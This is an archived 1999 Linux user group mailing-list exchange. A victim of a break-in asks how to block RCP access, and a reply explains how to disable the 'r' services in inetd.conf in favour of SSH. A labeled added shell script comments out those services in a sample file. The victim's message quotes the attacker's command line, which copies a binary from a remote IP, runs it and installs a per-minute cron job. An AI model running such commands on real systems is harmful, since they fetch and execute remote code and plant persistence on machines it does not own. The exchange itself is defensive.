[OLUG] RCP
Tim Russell
russell at probe.net
Tue Dec 14 19:22:17 UTC 1999
Of course, the final way to stop RCP and the other "r" commands is to
comment them out in your /etc/inetd.conf file. Another one of the first
things I do to a new box is comment EVERYTHING out of there except telnet,
ftp, and possibly identd. Then I restrict those services through the
/etc/hosts.allow and /etc/hosts.deny files.
Rlogin and such might be okay when you're sitting behind a good firewall
(might), but they have no business being enabled on any internet-accessible
machine these days. Everything you can do with them you can do securely and
encrypted with SSH.
Tim
P.S. Do a "kill -HUP" on your inetd process, or reboot, after changing
inetd.conf.
-----Original Message-----
From: Todd <buster18 at home.com>
To: olug at bstc.net <olug at bstc.net>
Date: Tuesday, December 14, 1999 11:40 AM
Subject: [OLUG] RCP
> Can anyone tell me how to stop RCP access to my Linux box, and if there are
>any security tools available to monitor an RCP connection. On December 11
>someone gained access and performed the following to my machine:
>rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
>/usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
>/usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
> I currently am running logwatch and uwatch, but this connection did not
>show up in either. Any suggestions would be welcomed.
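
Added example, not part of either poster's message: a shell sketch of the inetd.conf step described in the reply, which lists the enabled "r" service entries and writes a copy with them commented out. The function names and the sample file are constructed for illustration; rcp and rsh are served by the `shell` entry, rlogin by `login`, and rexec by `exec`.

```shell
#!/bin/sh
# Added example: audit an inetd.conf for enabled "r" services.
# Service names as they appear in inetd.conf: shell (rsh/rcp), login, exec.
R_SERVICES="shell login exec"

# Print the service name of every enabled (uncommented) r-service line.
enabled_r_services() {
    awk -v list="$R_SERVICES" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1 }
        /^[ \t]*#/ || NF == 0 { next }      # skip comments and blank lines
        ($1 in bad) { print $1 }
    ' "$1"
}

# Emit the file with enabled r-service lines commented out; all else unchanged.
disable_r_services() {
    awk -v list="$R_SERVICES" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1 }
        !/^[ \t]*#/ && NF > 0 && ($1 in bad) { print "#" $0; next }
        { print }
    ' "$1"
}

# Constructed sample in the classic inetd.conf layout (not the poster's file).
make_sample() {
    cat <<'EOF'
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
shell   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rshd
login   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rlogind
#exec   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rexecd
EOF
}

# Demo on the constructed sample only; nothing under /etc is touched.
sample=$(mktemp)
make_sample > "$sample"
echo "Enabled r-services before:"
enabled_r_services "$sample"
disable_r_services "$sample" > "$sample.hardened"
echo "Enabled r-services after: $(enabled_r_services "$sample.hardened" | wc -l)"
rm -f "$sample" "$sample.hardened"
```

On a real box, review the hardened copy before installing it as /etc/inetd.conf, then send inetd the HUP mentioned in the P.S. above.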